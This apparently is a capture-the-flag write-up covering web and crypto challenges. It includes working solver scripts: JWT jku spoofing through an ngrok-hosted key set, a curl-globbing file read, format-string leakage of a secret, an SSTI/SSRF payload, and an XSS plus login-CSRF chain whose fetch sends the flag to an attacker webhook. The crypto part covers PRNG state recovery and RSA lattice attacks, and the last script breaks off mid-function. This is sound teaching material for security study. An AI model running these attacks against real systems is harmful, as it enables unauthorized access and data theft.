
Web

Clicker

Challenge Overview

  • Category: Web
  • Provided Files: Source code (clicker.zip)
  • Goal: Bypass authentication and file access controls to read the flag from the server’s local file system.

Initial Analysis

  • File Identification: The application is a Python Flask web app managing files.
  • Observations:
    • Authentication is handled via JWTs (JSON Web Tokens) using the RS256 algorithm.
    • The application allows users to upload and download files.
    • The administration interface has a feature to “download” files from a URL.
  • Hypothesis: The JWT verification logic allows for key spoofing, and the download feature is vulnerable to Server-Side Request Forgery (SSRF) or Command Injection.

Vulnerability Analysis

The application exhibits a vulnerability chain involving JWT spoofing and improper input sanitization in a curl invocation.

  1. JKU Spoofing (Authentication Bypass): The verify_token function in utils/jwt_utils.py blindly trusts the jku (JSON Web Key Set URL) header in the JWT. It fetches the public key from the URL specified by the user to verify the signature.
    # VULNERABLE CODE
    jku_url = unverified['jku']
    jwks_data = fetch_jwks(jku_url) # Attacker controls jku_url
    # ...
    decoded = jwt.decode(token, public_key, algorithms=['RS256'])
    

    Although there is a validation check for the jku URL, it allows localhost and can be bypassed by abusing the userinfo part of the URL (e.g., http://user@localhost@<ngrok-host>/jwks.json).

  2. Curl Parameter Injection / Globbing: The admin download endpoint (/api/admin/download) constructs a command using subprocess.run(['curl', ...]). While it attempts to block the file:// protocol by checking startswith('file'), it fails to account for curl’s globbing functionality.
    # VULNERABLE CODE
    # blocked_protocols = ['file', ...]
    result = subprocess.run(['curl', '-o', output_path, '--', url], ...)
    

    An attacker can submit {file}:///flag.txt. The string starts with {file}, not file, so it passes the filter, but curl's URL globbing expands {file} to file and the request reads from the local filesystem.
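
The mismatch between the prefix check and the globbing step can be sketched in a few lines. This is a toy model under stated assumptions: BLOCKED_PREFIXES, is_blocked, and expand_braces are hypothetical names, the real filter may block more schemes, and the expansion function only imitates the brace alternation idea rather than reproducing curl's parser.

```python
import re

# Hypothetical filter: the writeup only confirms that 'file' is blocked via startswith().
BLOCKED_PREFIXES = ("file",)


def is_blocked(url: str) -> bool:
    """Mimic a prefix-based protocol check on the raw, unexpanded URL."""
    return url.lower().startswith(BLOCKED_PREFIXES)


def expand_braces(url: str) -> list[str]:
    """Toy model of brace alternation: {a,b} -> a and b, {file} -> file.

    This is an illustration only, not curl's implementation.
    """
    match = re.search(r"\{([^{}]*)\}", url)
    if match is None:
        return [url]
    expanded = []
    for alternative in match.group(1).split(","):
        candidate = url[:match.start()] + alternative + url[match.end():]
        expanded.extend(expand_braces(candidate))
    return expanded


payload = "{file}:///flag.txt"
passes_filter = not is_blocked(payload)   # the filter only sees '{file}:///...'
fetched_urls = expand_braces(payload)     # what the globbing step would request
print(passes_filter, fetched_urls)
```

The point of the sketch is that the check and the fetch operate on two different strings, so validating the unexpanded input says little about what is eventually requested.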

Exploitation / Solver

Methodology:

  1. Key Hosting: Generate a malicious RSA key pair and host the public key in a JWKS format on an external server (e.g., using ngrok).
  2. Token Forgery: Create a JWT signed with the malicious private key. Set the jku header to the hosted JWKS URL, bypassing the filter using the @ syntax (e.g., http://user@localhost@<ngrok-host>/jwks.json).
  3. Authentication: Log in with the forged admin token.
  4. Protocol Filter Bypass: Submit a request to the download endpoint with the URL "{file}:///flag.txt", relying on curl globbing to turn it into a file:// request.
  5. Retrieval: The server fetches the flag file and saves it to a static directory, making it accessible for download.
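
The @ trick in step 2 relies on two components disagreeing about which part of the URL is the host. The following sketch illustrates that kind of parser discrepancy; naive_host is a hypothetical validator (the challenge's real check is not shown in this writeup) and attacker.example is a placeholder host.

```python
from urllib.parse import urlsplit


def naive_host(url: str) -> str:
    """Hypothetical validator: treats the text after the FIRST '@' as the host."""
    authority = url.split("://", 1)[1].split("/", 1)[0]
    if "@" in authority:
        authority = authority.split("@", 1)[1]
    # Drop anything after a further '@' or a port separator.
    return authority.split("@", 1)[0].split(":", 1)[0]


jku = "http://user@localhost@attacker.example/jwks.json"
seen_by_validator = naive_host(jku)        # what a first-'@' parser believes
seen_by_urlsplit = urlsplit(jku).hostname  # Python's urlsplit uses the LAST '@'
print(seen_by_validator, seen_by_urlsplit)
```

If the allow-list logic resembles the first function while the HTTP client resolves the host like the second, a URL that "looks like localhost" is fetched from the attacker's server.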

Solver Script:

import jwt
import datetime
import requests
import time
import threading
import os
import json
import base64
from pyngrok import ngrok
from http.server import HTTPServer, SimpleHTTPRequestHandler
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

HOST_IP = "challenges.1pc.tf"
TARGET_PORT = 41846
TARGET_URL = f"http://{HOST_IP}:{TARGET_PORT}"
LOCAL_PORT = 8000

def generate_keys():
    # Generate 2048-bit RSA key
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    private_pem = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption()
    )
    # Generate JWKS
    pk_nums = private_key.public_key().public_numbers()
    jwks = {
        "keys": [{
            "kty": "RSA", "kid": "exploit_key", "use": "sig", "alg": "RS256",
            "n": int_to_base64(pk_nums.n), "e": int_to_base64(pk_nums.e)
        }]
    }
    with open('jwks.json', 'w') as f: json.dump(jwks, f)
    return private_pem

def int_to_base64(n):
    return base64.urlsafe_b64encode(n.to_bytes((n.bit_length()+7)//8, 'big')).rstrip(b'=').decode('utf-8')

class JWKSHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/jwks.json':
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            with open('jwks.json', 'rb') as f: self.wfile.write(f.read())
        else: self.send_error(404)

def solve():
    private_key_pem = generate_keys()
    
    # Start local server and ngrok
    server = threading.Thread(target=lambda: HTTPServer(("", LOCAL_PORT), JWKSHandler).serve_forever(), daemon=True)
    server.start()
    tunnel = ngrok.connect(LOCAL_PORT, "tcp")
    public_url = tunnel.public_url.replace("tcp://", "").replace("http://", "").replace("https://", "")
    print(f"[+] Tunnel: {public_url}")

    # Forge Token
    jku = f"http://user@localhost@{public_url}/jwks.json"
    payload = {
        'user_id': 1337, 'username': 'admin', 'is_admin': True,
        'exp': datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(hours=1),
        'jku': jku
    }
    token = jwt.encode(payload, private_key_pem, algorithm='RS256', headers={'kid': 'exploit_key'})

    # Exploit
    headers = {'Authorization': f'Bearer {token}'}
    data = {'url': "{file}:///flag.txt", 'filename': "flag.txt", 'type': 'text'}
    requests.post(f"{TARGET_URL}/api/admin/download", json=data, headers=headers)
    
    # Retrieve
    print(requests.get(f"{TARGET_URL}/static/flag.txt", headers=headers).text)

if __name__ == "__main__":
    solve()

Final Flag

C2C{p4rs3r_d1sr4p4ncy_4nd_curl_gl0bb1ng_1s_my_f4v0r1t3_0f89c517a261}

Reasoning: Only by bypassing both the signature validation (via JKU spoofing) and the protocol filter (via Curl globbing) can the restricted flag file be read.


Corp-Mail

Challenge Overview

  • Category: Web
  • Provided Files: Source code (corp-mail.zip)
  • Goal: Gain administrative access to the email system and retrieve the flag from a specific email.

Initial Analysis

  • Observations:
    • Users can register and set a “signature” for their emails.
    • The signature formatting uses Python’s str.format().
    • Administrative access is guarded by an HAProxy rule blocking /admin.
  • Hypothesis: Python string formatting vulnerability leads to information disclosure, and URL normalization differences allow bypassing the proxy.

Vulnerability Analysis

  1. Format String Injection: The application formats the user’s signature using template.format() and passes current_app as the app argument. A user-controlled template can therefore traverse that object's attributes, including the application configuration.
    # VULNERABLE CODE
    from flask import current_app as app
    return template.format(username=username, app=app)
    

    Injecting {app.config} dumps the configuration, including JWT_SECRET.

  2. HAProxy Bypass: HAProxy is configured to deny access to paths starting with /admin. However, Flask’s URL decoding normalizes /%2fadmin to /admin after it passes the proxy. HAProxy treats %2f literally and does not match the block rule.
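
The format string leak from item 1 can be reproduced without Flask. In this minimal sketch, FakeApp and render_signature are hypothetical stand-ins for current_app and the application's signature renderer, and the secret value is a placeholder.

```python
class FakeApp:
    """Stand-in for Flask's current_app: only the config mapping matters here."""

    def __init__(self):
        self.config = {"JWT_SECRET": "not-the-real-secret", "DEBUG": False}


def render_signature(template: str, username: str, app: FakeApp) -> str:
    # Same shape as the vulnerable call: the template is user-controlled.
    return template.format(username=username, app=app)


app = FakeApp()
benign = render_signature("Regards, {username}", "alice", app)
leak_all = render_signature("{app.config}", "alice", app)
leak_one = render_signature("{app.config[JWT_SECRET]}", "alice", app)
print(benign)
print(leak_all)
print(leak_one)
```

str.format() resolves attribute access and item lookups inside replacement fields, so any object handed to it is reachable from the template. Passing only plain strings as format arguments avoids the leak.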

Exploitation / Solver

Methodology:

  1. Leak Secret: Update the user signature to {app.config}. View the settings page to see the rendered configuration and extract JWT_SECRET.
  2. Forge Token: Create a new JWT using the leaked secret with is_admin=True.
  3. Bypass Proxy: Access the admin panel using the forged token via the path /%2fadmin.
  4. IDOR (Insecure Direct Object Reference): The admin email viewer (/admin/email/<id>) does not check ownership. Brute-force IDs to find the flag.
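
Step 2 works because HS256 is a plain HMAC over the encoded header and payload, so knowing the secret is enough to mint any claims. The sketch below shows this with the standard library only; the helper names and the secret value are illustrative assumptions, and the solver itself uses PyJWT instead.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url without padding, as used by JWT."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def forge_hs256(claims: dict, secret: str) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [
        b64url(json.dumps(header, separators=(",", ":")).encode()),
        b64url(json.dumps(claims, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(parts)
    signature = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(signature)


def verify_hs256(token: str, secret: str) -> dict:
    """Recompute the HMAC the way a server would and return the claims."""
    signing_input, _, signature = token.rpartition(".")
    expected = b64url(hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(signature, expected):
        raise ValueError("bad signature")
    payload_b64 = signing_input.split(".")[1]
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


leaked_secret = "not-the-real-secret"  # placeholder for the leaked JWT_SECRET
token = forge_hs256({"user_id": 1, "username": "admin", "is_admin": 1}, leaked_secret)
claims = verify_hs256(token, leaked_secret)
print(claims)
```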

Solver Script:

import requests, jwt, re, datetime

BASE_URL = "http://challenges.1pc.tf:22042"

s = requests.Session()
# (Registration omitted for brevity)
# 1. Leak Config
s.post(f"{BASE_URL}/settings", data={"signature": "{app.config}"})
config = s.get(f"{BASE_URL}/settings").text
secret = re.search(r"'JWT_SECRET': '([^']+)'", config).group(1)

# 2. Forge Token
token = jwt.encode({
    'user_id': 1, 'username': 'admin', 'is_admin': 1,
    'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
}, secret, algorithm="HS256")
s.cookies.set("token", token)

# 3. Bypass Proxy & 4. IDOR
for i in range(1, 20):
    r = s.get(f"{BASE_URL}/%2fadmin/email/{i}")
    if "C2C{" in r.text:
        print(re.search(r"C2C\{[^}]+\}", r.text).group(0))
        break

Final Flag

C2C{f0rm4t_str1ng_l34k5_4nd_n0rm4l1z4t10n_fc0b7f7463de}

Reasoning: The leak of the signing key allowed privilege escalation, and the proxy bypass provided access to the internal IDOR vulnerability.
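
The proxy bypass can be modeled as two components normalizing the same path differently. This is a toy model, not HAProxy's or Flask's actual code: proxy_denies and backend_route are hypothetical, and the backend behavior (percent-decoding followed by collapsing repeated slashes) is an assumption chosen to match the behavior described in this writeup.

```python
import re
from urllib.parse import unquote


def proxy_denies(raw_path: str) -> bool:
    """Toy proxy rule: deny when the raw, still-encoded path begins with /admin."""
    return raw_path.startswith("/admin")


def backend_route(raw_path: str) -> str:
    """Toy backend: percent-decode, then collapse repeated slashes (assumed behavior)."""
    return re.sub(r"/{2,}", "/", unquote(raw_path))


request_path = "/%2fadmin/email/1"
print(proxy_denies(request_path), backend_route(request_path))
```

Under these assumptions the proxy lets the request through while the backend still routes it to the admin handler.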


The Soldier of God, Rick

Challenge Overview

  • Category: Web
  • Provided Files: Source code (thesoldierofgodrick.zip)
  • Goal: Defeat the boss “Rick” by reducing his HP to zero.

Initial Analysis

  • Observations:
    • The app is written in Go.
    • User input (battle_cry) is rendered to a template.
    • A method Rick.Scout(url) is available in the template context.
    • An internal endpoint /internal/offer-runes decreases Rick’s HP but validates the input amount.

Vulnerability Analysis

  1. Server-Side Template Injection (SSTI): The application uses fmt.Sprintf to construct the template source with user input before parsing it. This allows injecting template actions.
    tmpl_str := fmt.Sprintf("Your cry: %s", battle_cry) // VULNERABLE
    t.Parse(tmpl_str)
    
  2. Integer Overflow: The internal endpoint receives an amount as an int64 but casts it to int32 when calculating damage.
    // Conceptual Logic
    var amount int64 = parse(input)
    if amount < 0 { error() }
    hp -= int32(amount) // VULNERABLE CHECK
    

    Sending 2147483649 ($2^{31} + 1$) passes the non-negative check as an int64 but wraps around to $-2147483647$ when cast to int32.

    Note that with the conceptual logic above, hp -= int32(amount) with a negative amount would raise Rick's HP rather than lower it. The snippet is only a reconstruction, and the real handler presumably uses the truncated value differently (for example, with the opposite sign, or after a limit check performed on the int64 value). What is known is the observed outcome: the overflowed amount kills the boss instantly. The exact arithmetic was not confirmed for this writeup.

  3. SSRF: The Rick.Scout function allows GET requests to the internal endpoint (localhost).
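
The wraparound in item 2 can be checked with a small helper that imitates a 64-bit to 32-bit signed conversion. to_int32 is a hypothetical name; the sketch models the truncation only, not the handler's HP arithmetic.

```python
def to_int32(value: int) -> int:
    """Keep the low 32 bits and reinterpret them as a signed integer,
    which is what a narrowing conversion such as Go's int32(x) does."""
    return ((value + 2**31) % 2**32) - 2**31


amount = 2**31 + 1            # 2147483649, non-negative as an int64
wrapped = to_int32(amount)    # value seen after the narrowing cast
print(amount >= 0, wrapped)
```

Any validation performed before the cast therefore reasons about a different number than the one used afterwards.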

Exploitation / Solver

Methodology:

  1. Payload Construction: Create a Go template payload that calls .Rick.Scout with the internal URL.
  2. Overflow Target: Use the exact amount 2147483649.
  3. Injection: Submit the payload as the battle_cry.

Payload:

{{ .Rick.Scout "http://127.0.0.1:8080/internal/offer-runes?amount=2147483649" }}{{ .Secret }}

Final Flag

C2C{R1ck_S0ld13r_0f_G0d_H4s_F4ll3n_v14_SST1_SSR7_4b5b915f89de}


Unsafe Notes

Challenge Overview

  • Category: Web
  • Goal: Steal the flag from the admin’s notes via XSS.

Vulnerability Analysis

The app uses a sanitizer library domiso (v0.1.1) which is vulnerable to DOM Clobbering.

  1. Sanitization Bypass: By injecting a <form> with an input named attributes, we clobber the attributes property of the form element. The sanitizer accesses node.attributes (expecting the NamedNodeMap) but gets the input element instead. This causes the loop over attributes to fail or misbehave, allowing malicious attributes (like oncontentvisibilityautostatechange) to pass through.
  2. Login CSRF: The login endpoint has no CSRF token, so we can force the admin's browser to log in to our account.

Exploitation / Solver

Methodology:

  1. Prep: Attacker registers an account and creates a note containing the DOM Clobbering XSS payload.
    <form id=x style=display:block;content-visibility:auto oncontentvisibilityautostatechange=eval(atob('...fetch(webhook?flag=opener.document.body.innerText)...'))>
      <input name=attributes><input name=attributes>
    </form>
    
  2. Attack Flow:
    • The admin bot visits the exploit page (Window A).
    • Window A opens Window B (/exploit) and, after one second, navigates itself to http://localhost/api/notes. The admin session is still active at this point, so Window A now displays the admin's notes, including the flag.
    • Window B opens Window C (/csrf), which auto-submits the login form and logs the browser in to the attacker's account (Login CSRF).
    • After two seconds, Window B navigates to the dashboard at http://localhost/. Because the session now belongs to the attacker, the dashboard renders the attacker's note containing the XSS payload.
    • The XSS executes in Window B. Window B and its opener (Window A) are both on the http://localhost origin, so the payload can read opener.document.body.innerText, which still holds the flag loaded under the admin session, and send it to the webhook.

Solver Script:

from flask import Flask, request
from pyngrok import ngrok
import threading
import requests
import base64
import time
import os
import random
import string

PORT = 5001
app = Flask(__name__)

HOST = "http://challenges.1pc.tf:33084/"

req = requests.Session()
username = "".join(random.choices(string.ascii_letters, k=10))
password = "".join(random.choices(string.ascii_letters, k=10))
req.post(HOST + "api/auth/register", json={"username": username, "password": password})

def save_payload(public_url):
    cmd = f"fetch('{public_url}/webhook?flag='+opener.document.body.innerText)"
    cmd = base64.b64encode(cmd.encode()).decode()
    xss = f"<form id=x style=display:block;content-visibility:auto oncontentvisibilityautostatechange=eval(atob('{cmd}'))><input name=attributes><input name=attributes></form>"
    req.post(HOST + "api/notes", json={"title": "xss", "content": xss})

# ---------- Routes ----------
@app.route("/")
def index():
    return """
<script>
    setTimeout(() => {
        window.location = 'http://localhost/api/notes';
    }, 1000);
    open('exploit');
</script>
    """

@app.route("/exploit")
def exploit():
    return """
<script>
    setTimeout(() => {
        window.location = 'http://localhost/';
    }, 2000);
    open('csrf');
</script>
    """

@app.route("/csrf")
def csrf():
    return f"""
<form action="http://localhost/api/auth/login" method="POST">
    <input type="text" name="username" value="{username}">
    <input type="text" name="password" value="{password}">
    <input type="submit">
</form>

<script>
    setTimeout(() => {{
        document.querySelector('form').submit();
    }}, 500);
</script>
    """



@app.route("/webhook", methods=["GET"])
def webhook():
    flag = request.args.get("flag", "")  # default to "" so the check below never sees None
    print("Incoming:", flag)
    if "C2C{" in flag:
        with open("flag.txt", "w") as f:
            f.write(flag)
        print("[SUCCESS] Flag saved to flag.txt")
        # Exit after a short delay
        threading.Timer(1.0, lambda: os._exit(0)).start()
    return {"status": "ok"}


# ---------- Start Flask ----------
def run_flask():
    app.run(host="0.0.0.0", port=PORT, debug=False, use_reloader=False)


if __name__ == "__main__":
    # Start Flask in background
    threading.Thread(target=run_flask).start()

    # Create tunnel using tcp
    public_url = ngrok.connect(PORT, proto="tcp").public_url.replace("tcp://", "http://")
    save_payload(public_url)
    print(f"[*] Exploit URL: {public_url}")
    
    visit_url = HOST + f"visit?url={public_url}"
    print(f"[*] Starting retry loop for: {visit_url}")
    
    while True:
        try:
            print(f"[*] Sending bot to: {visit_url}")
            requests.get(visit_url, timeout=2)
        except Exception as e:
            print(f"[-] Request error: {e}")
        # Wait for 10 seconds before retrying
        time.sleep(10)

Final Flag

C2C{you_are_right_it_is_indeed_very_unsafe_1698141b1832}


Crypto

AIC Gachapon

Challenge Overview

  • Category: Crypto
  • Goal: Predict the RNG state to generate a winning “Redeem Code”.

Vulnerability Analysis

The application uses .NET’s System.Random. In .NET Core (and 5+), the seeded implementation of System.Random (Net5CompatSeedImpl, used when a seed is supplied) is a Knuth subtractive generator with lag 55. The PRNG output stream $x_n$ follows the recurrence $x_n = (x_{n-55} - x_{n-34}) \bmod (2^{31}-1)$. The application exposes raw Next() outputs via the /api/recent endpoint, so by collecting enough samples (55 or more) we can reconstruct the internal state and predict all future outputs.
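
To see why observing outputs is enough, the recurrence can be simulated directly. The sketch below is a model of the recurrence as stated above, not of .NET's exact implementation (which has its own seeding procedure and edge-case handling); subtractive_stream and predict_next are hypothetical names, and the initial state is arbitrary.

```python
import random

MBIG = 2**31 - 1


def subtractive_stream(initial_state, count):
    """Produce `count` outputs of x_n = (x_{n-55} - x_{n-34}) mod MBIG."""
    history = list(initial_state)
    if len(history) != 55:
        raise ValueError("the generator needs exactly 55 initial values")
    outputs = []
    for _ in range(count):
        nxt = (history[-55] - history[-34]) % MBIG
        history.append(nxt)
        outputs.append(nxt)
    return outputs


def predict_next(observed):
    """Predict the next output from at least 55 consecutive observed outputs."""
    return (observed[-55] - observed[-34]) % MBIG


rng = random.Random(1234)                       # arbitrary state for the demo
state = [rng.randrange(MBIG) for _ in range(55)]
outputs = subtractive_stream(state, 200)

observed = outputs[:100]                        # what an attacker has seen
prediction = predict_next(observed)
print(prediction == outputs[100])
```

The solver has to do more work than this because each frame reveals only some of the 25 values consumed per tick, which is why it propagates the recurrence forwards and backwards to fill the gaps.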

Exploitation / Solver

Methodology:

  1. Harvest: Query /api/recent to get ~30 frames of RNG data.
  2. State Reconstruction: Map the samples to the Lag-55 buffer.
  3. State Recovery: Use the recurrence relation to fill in any gaps in the buffer and extend it forward.
  4. Prediction: Calculate the RedeemCode for the next tick and submit it.

Solver Script:

import requests
import sys
import time

SERVER = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"

MBIG = 2147483647
MSEED = 161803398

def get_recent(n=30):
    try:
        r = requests.get(f"{SERVER}/api/recent/{n}")
        r.raise_for_status()
        return r.json()
    except Exception as e:
        print(f"[!] Error fetching recent: {e}")
        return []

def get_frame():
    try:
        r = requests.get(f"{SERVER}/api/frame")
        r.raise_for_status()
        return r.json()
    except Exception as e:
        print(f"[!] Error fetching frame: {e}")
        return None

def redeem(tick_id, code):
    try:
        r = requests.post(f"{SERVER}/api/redeem", json={"tickId": tick_id, "code": code})
        return r.json()
    except Exception as e:
        if hasattr(e, 'response') and e.response:
             try: return e.response.json()
             except: pass
        return {"success": False, "message": str(e)}

def solve():
    print(f"[*] Connecting to {SERVER}")
    
    while True:
        frames = get_recent(30)
        frames.sort(key=lambda x: x['tickId'])
        
        consecutive = []
        current_block = []
        for f in frames:
            if not current_block:
                current_block.append(f)
            else:
                if f['tickId'] == current_block[-1]['tickId'] + 1:
                    current_block.append(f)
                else:
                    if len(current_block) > len(consecutive):
                        consecutive = current_block
                    current_block = [f]
        if len(current_block) > len(consecutive):
            consecutive = current_block
            
        print(f"[*] Best consecutive block: {len(consecutive)} frames")
        
        if len(consecutive) >= 12: 
            break
        
        print("[*] Waiting for more frames...")
        time.sleep(2)
        get_frame() 
    
    frames = consecutive
    num_frames = len(frames)
    total_samples = num_frames * 25
    
    s = [None] * total_samples
    
    for i, f in enumerate(frames):
        offset = i * 25 + 4
        for j, val in enumerate(f['sampleInts']):
            s[offset + j] = val
            
    # Propagate known samples through the lag-55/lag-34 recurrence until nothing changes
    changed = True
    iterations = 0
    while changed:
        changed = False
        iterations += 1
        
        # Forward: x_n = (x_{n-55} - x_{n-34}) % MBIG
        for n in range(55, total_samples):
            if s[n] is None:
                if s[n-55] is not None and s[n-34] is not None:
                    val = (s[n-55] - s[n-34]) % MBIG
                    if val == MBIG: val -= 1
                    s[n] = val
                    changed = True
        
        # Backward 1: x_{n-55} = (x_n + x_{n-34})
        for n in range(55, total_samples):
            if s[n-55] is None:
                if s[n] is not None and s[n-34] is not None:
                    s[n-55] = (s[n] + s[n-34]) % MBIG
                    changed = True
                    
        # Backward 2: x_{n-34} = (x_{n-55} - x_n)
        for n in range(55, total_samples):
             if s[n-34] is None:
                if s[n] is not None and s[n-55] is not None:
                    val = (s[n-55] - s[n]) % MBIG
                    s[n-34] = val
                    changed = True

    known = sum(1 for x in s if x is not None)
    print(f"[*] Recovered {known}/{total_samples} samples ({iterations} iterations)")
    
    # 1. VERIFY RECURRENCE
    errors = 0
    for n in range(55, total_samples):
        if s[n] is not None and s[n-55] is not None and s[n-34] is not None:
            expected = (s[n-55] - s[n-34]) % MBIG
            if expected == MBIG: expected -= 1
            if s[n] != expected:
                # Mismatches may stem from Next(MBIG) rounding; count them without aborting.
                errors += 1
    if errors == 0:
        print("[*] Recurrence check PASSED")
    else:
        print(f"[!] Recurrence check FAILED with {errors} errors (expected due to approximation)")

    # 2. VERIFY SAMPLE BYTES (Must be reasonably close)
    byte_errors = 0
    for i, f in enumerate(frames):
        # Bytes at 20, 21, 22, 23
        offset = i * 25 + 20
        observed_hex = f.get('sampleBytesHex', '')
        if not observed_hex: continue
        
        try:
            observed_bytes = bytes.fromhex(observed_hex)
        except:
            continue
            
        predicted_bytes = []
        match = True
        for k in range(4):
            idx = offset + k
            if s[idx] is not None:
                byte_val = s[idx] % 256
                predicted_bytes.append(byte_val)
                if k < len(observed_bytes) and byte_val != observed_bytes[k]:
                    match = False
            else:
                predicted_bytes.append("?")
        
        if not match:
            # print(f"[!] Bytes mismatch at frame {i}: {predicted_bytes} vs {observed_bytes}")
            byte_errors += 1
            
    if byte_errors == 0:
        print("[*] SampleBytes check PASSED")
    else:
        print(f"[!] SampleBytes check FAILED with {byte_errors} errors")

    # Predict
    for i, f in enumerate(frames):
        redeem_idx = i * 25 + 24
        if s[redeem_idx] is not None:
            code = int(s[redeem_idx] * (1.0/MBIG) * 10000000)
            print(f"[*] Tick {f['tickId']}: Predict code {code}")
            res = redeem(f['tickId'], code)
            print(f"    Result: {res}")
            if res.get('success') or 'flag' in res:
                print(f"\n[!!!] FLAG: {res.get('flag')}")
                return

    # Try next tick prediction
    last_tick = frames[-1]['tickId']
    next_tick = last_tick + 1
    next_base = num_frames * 25
    redeem_offset = 24
    
    # Needs to extend
    extra = 50
    s.extend([None]*extra)
    # Forward prop only
    for n in range(total_samples, total_samples + extra):
        if n >= 55 and s[n-55] is not None and s[n-34] is not None:
             val = (s[n-55] - s[n-34]) % MBIG
             if val == MBIG: val -= 1
             s[n] = val
             
    target = next_base + 24
    if target < len(s) and s[target] is not None:
         code = int(s[target] * (1.0/MBIG) * 10000000)
         print(f"[*] Predict NEXT Tick {next_tick}: {code}")
         
         # Wait
         print("    Waiting...")
         while True:
             f = get_frame()
             if f and f['tickId'] >= next_tick:
                 break
             time.sleep(0.5)
         
         res = redeem(next_tick, code)
         print(f"    Result: {res}")
         if res.get('success') or 'flag' in res:
                print(f"\n[!!!] FLAG: {res.get('flag')}")
                return

if __name__ == "__main__":
    solve()

Final Flag

C2C{0a0628bc8d88}


Tet

Challenge Overview

  • Category: Crypto
  • Goal: Recover the hidden message s from a custom cryptosystem.

Vulnerability Analysis

The cryptosystem uses:

  1. Structure: $f = e \cdot M_1 + c$
  2. Parameters: Small a and b (1000 bits) relative to N (2048 bits).
  3. Relation: $val_{ab} = a \cdot b^{-1} \pmod N$.

Attacks:

  1. Rational Reconstruction: Since $a, b \approx N^{1/2}$, we can recover $a$ and $b$ from $val_{ab}$ using the Extended Euclidean Algorithm (Rational Reconstruction).
  2. Hidden Number Problem (HNP): The equation $f_i = e_i \cdot M_1 + c_i$ (where $c_i$ is small/structured) poses an HNP. We can use Lattice Reduction (LLL) to recover the shared secret $M_1$.
  3. Factorization: With the recovered parameters, we derive a relation $k/d \approx e/N^3$. Continued Fractions can efficiently recover the private exponent $d$, allowing factorization of $N$.
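
The first attack can be illustrated on toy numbers. The sketch below mirrors the Euclidean loop used for rational reconstruction, but with a small prime modulus and hand-picked values (N = 10007, a = 7, b = 3) that are assumptions for the demo, not challenge parameters.

```python
import math


def rational_reconstruct(val: int, modulus: int):
    """Find small (a, b) with a = b * val (mod modulus), or None on failure."""
    limit = math.isqrt(modulus)
    r0, r1 = modulus, val
    t0, t1 = 0, 1
    # Run the extended Euclidean algorithm until the remainder drops below sqrt(modulus).
    while r1 > limit:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        t0, t1 = t1, t0 - q * t1
    a, b = r1, abs(t1)
    if (b * val) % modulus == a:
        return a, b
    return None


N = 10007                          # toy prime modulus
val = (7 * pow(3, -1, N)) % N      # "a/b" as published by the service
recovered = rational_reconstruct(val, N)
print(val, recovered)
```

Each step of the Euclidean algorithm maintains the invariant $r_i \equiv t_i \cdot val \pmod N$, so stopping once the remainder is small yields a numerator and denominator that are both of modest size.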

Exploitation

The solver script implements:

  1. Rational Reconstruction for $a, b$.
  2. CVP/LLL for $M_1$.
  3. Wiener’s Attack variant (Continued Fractions) for $d$.
  4. Standard RSA decryption using $d$.

Solver Script:

from pwn import *
from Crypto.Util.number import getPrime, inverse, long_to_bytes
import math
import sys
from math import gcd

# Set up pwntools context
context.log_level = 'debug'

def solve_ab(val, N):
    # a * b^-1 = val mod N
    # We use rational reconstruction (Euclidean algorithm variant)
    # Target size: a, b ~ 2^1000. N ~ 2^2048.
    limit = math.isqrt(N)
    
    r0, r1 = N, val
    t0, t1 = 0, 1
    
    while r1 > limit:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        t0, t1 = t1, t0 - q * t1
        
    a = r1
    b = abs(t1)
    
    if (b * val) % N == a:
        return a, b
    return None, None

def integer_cbrt(n):
    if n < 0: return -integer_cbrt(-n)
    if n == 0: return 0
    low = 0
    high = 1 << ((n.bit_length() + 2) // 3)
    while low < high:
        mid = (low + high + 1) // 2
        if mid**3 <= n:
            low = mid
        else:
            high = mid - 1
    return low

def solve_d_factor_N(e, N, a, b):
    # e / N^3 approx k / d
    # Continued fraction of e / N^3
    
    n, d_val = e, N**3
    numerators = [0, 1]
    denominators = [1, 0]
    
    BITS = N.bit_length() // 2
    
    while True:
        if d_val == 0: break
        
        q_val = n // d_val
        n, d_val = d_val, n % d_val
        
        # update convergents
        num = q_val * numerators[-1] + numerators[-2]
        den = q_val * denominators[-1] + denominators[-2]
        
        numerators.append(num)
        denominators.append(den)
        
        # Check if den is close to d (1024 bits)
        if den.bit_length() > BITS + 50: # Check bounds
            break
            
        candidate_k = num
        candidate_d = den
        
        if candidate_k == 0: continue
            
        computed_phi = (e * candidate_d - 1) // candidate_k
        
        # Check quadratic
        # b (p^3)^2 + K (p^3) + a N^3 = 0
        K = computed_phi - a*b - N**3
        
        delta = K**2 - 4 * b * a * N**3
        
        if delta >= 0:
            is_square = False
            try:
                sqrt_delta = math.isqrt(delta)
                if sqrt_delta * sqrt_delta == delta:
                    is_square = True
            except: pass
            
            if is_square:
                x1 = (-K + sqrt_delta) // (2*b)
                x2 = (-K - sqrt_delta) // (2*b)
                
                for x in [x1, x2]:
                    if x <= 0: continue
                    p_cand = integer_cbrt(x)
                    if p_cand**3 == x:
                        if N % p_cand == 0:
                             q_cand = N // p_cand
                             return candidate_d, p_cand, q_cand
    return None, None, None

from fpylll import IntegerMatrix, LLL

def solve_e_lattice(fs):
    # fs is a list of [f1, f2, f3, ...]
    # We construct a lattice to find e1.
    # Rows:
    # [ 1, round(M*f2/f1), round(M*f3/f1), ... ]
    # [ 0, M, 0, ... ]
    # [ 0, 0, M, ... ]
    
